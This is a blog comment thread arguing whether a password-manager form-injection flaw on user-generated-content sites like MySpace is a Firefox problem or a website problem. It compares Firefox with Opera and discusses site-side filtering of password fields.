"anon, actually it is a website issue and with very little additional social engineering, that bug can bite both IE and Opera. You really should read up a bit more on it before you spout off. The website flaw is more easily taken advantage of in Firefox than in IE or Opera, but it's still there in all of them."

At the risk of beeing seen to be "spouting off" again, the fact still remains that it's listed as a vulnerability by Secunia in Firefox 2.0.0.1, but not in Opera 9.10. Therefore, doesn't it make it a browser issue as much as a website issue? Wouldn't it be safer for users if Mozilla adopted something like Opera's Wand to replace the current Password Manager? ;)

anon, Secunia doesn't always get things right. Adopting a different UI just forces the attacker to adapt slightly. As Jesse put it, "It would hurt usability quite a bit on all sites, and it wouldn't really solve this security problem for myspace. It would just require the exploits to be a little more clever... the right solution is to tell myspace and similar sites to disallow input type="password" in user-generated content the same way they disallow XSS hazards like inline scripts, onclick, -moz-binding, etc." Additionally, "Few sites need this kind of extra protection from browsers. Sites that care about this kind of attack always care about XSS, and sites that care about XSS usually have tag and attribute whitelists that don't allow password form elements."

To make this even easier to grok, it's worth noting that you're currently participating on a site that allows user generated content. Everything you post to this comment thread is user generated content that my blog allows. You could attempt to put inline scripts or other dangerous content into my comments here and my blog is smart enough to disallow that. There's either a whitelist or a blacklist in the Movable Type software that (hopefully) disallows you from adding dangerous content to my blog through the comments. Claiming that browsers should have done that rather than websites and site CMSs like Movable Type would suggest that browsers should stop supporting inline scripts for all websites because a few, like this blog, could suffer if inline scripts were allowed to be added by commenters. That would be wrong and it would be a disservice to web developers and web users to remove or cripple a feature like inline scripts because it could be abused by someone on a site like this which allows user generated content.

To put all that very simply, I'll pose this question. If you can insert a script or other dangerous content by typing a comment here at my blog, is that the blog software's problem or the browser's? I'm saying it's the blog's fault and not the browser.

The obvious answer here is that those websites and CMSs that allow for user generated content need to add another item to their whitelist or blacklist that makes sure that input type=password cannot be used on those sites. There's even less reason for that to be used than inline scripts and other disallowed content which I can imagine a legitimate use for. Myspace and probably quite a few other sites and CMSs have already corrected this problem. Like blocking inline scripts, which is probably ubiquitous at sites allowing user generated content, this will soon be covered by all of the sites where it matters.

All of that doesn't mean that browser makers shouldn't be trying to find smart ways to prevent websites from doing unsmart things. It does mean, though, that the primary responsibility rests with the websites.

'anon, Secunia doesn't always get things right. Adopting a different UI just forces the attacker to adapt slightly. As Jesse put it, "It would hurt usability quite a bit on all sites, and it wouldn't really solve this security problem for myspace. It would just require the exploits to be a little more clever... the right solution is to tell myspace and similar sites to disallow input type="password" in user-generated content the same way they disallow XSS hazards like inline scripts, onclick, -moz-binding, etc." '

To go off-topic a little bit: that being the case, it would seem that a better solution would lie with browsers (whatever browsers), if possible, than in expecting website authors to be always keeping their noses clean and using "proper" or "safe" code. What's to keep the input type="password" from showing up on any number of sites? (This is coming from a non-developer, obviously.)

@anon, if input type="password" shows up on a random site, that's perfectly safe. The vulnerability only exists when it shows up on the same site where the user has saved a password, and when it's in a form that imitates the login form well enough to trick the password manager.

Whether the HTML is "safe" or not in this case isn't about the code itself, but about who's providing it. Really, it boils down to the fact with any site that allows random people to contribute content, the web browser has no way to know which code comes from the host, and which code comes from outside users. It might be possible to make lists for specific sites, but then those would stop working the next time the site changed its layout.

Thanks, Kelson.

Beep: "Yes, deemed moderate by Opera, but critical most others."

Who knows Opera better, Opera or someone who only has a theoretical attack but can't show a real proof of concept?

Asa: "actually it is a website issue"

Actually this is a terrible excuse for bad security in Firefox. Don't blame others for your own security flaws. Firefox is bitten by this, Opera isn't. It's that simple.

You claim that it can be done in Opera, but you have no evidence that this is the case. Put your money where your mouth is or stop blaming sites for security holes in Firefox.

Asa, please stop your Opera-bashing. What did you yourself say on http://weblogs.mozillazine.org/asa/archives/2005/07/no_respect_for.html

You know it isn't fun to have people firing nasty comments at you--especially when they are uncalled for and completely untrue. So why do you do it to others? Because you can and you can get away with it? Perhaps. Opera truly has in heart their users and their friends and doesn't stab other browsers in the back.

Think about your own quote for a bit: "Webmasters, listen up. Respect your users or you will lose them. With Firefox, the user is no longer just a spectator, he's a participant. Play nice or face extinction. Seriously."

Play nice. Or. Face. Extinction.

asa, just accept that opera is better than FF, and opera is not disclosing security issues of their browser they just need time to review the issue if its true or it is just a hoax. accept that mozilla has limits and so does opera. so stop criticizing opera, instead be open-minded like the programs of mozilla their open-source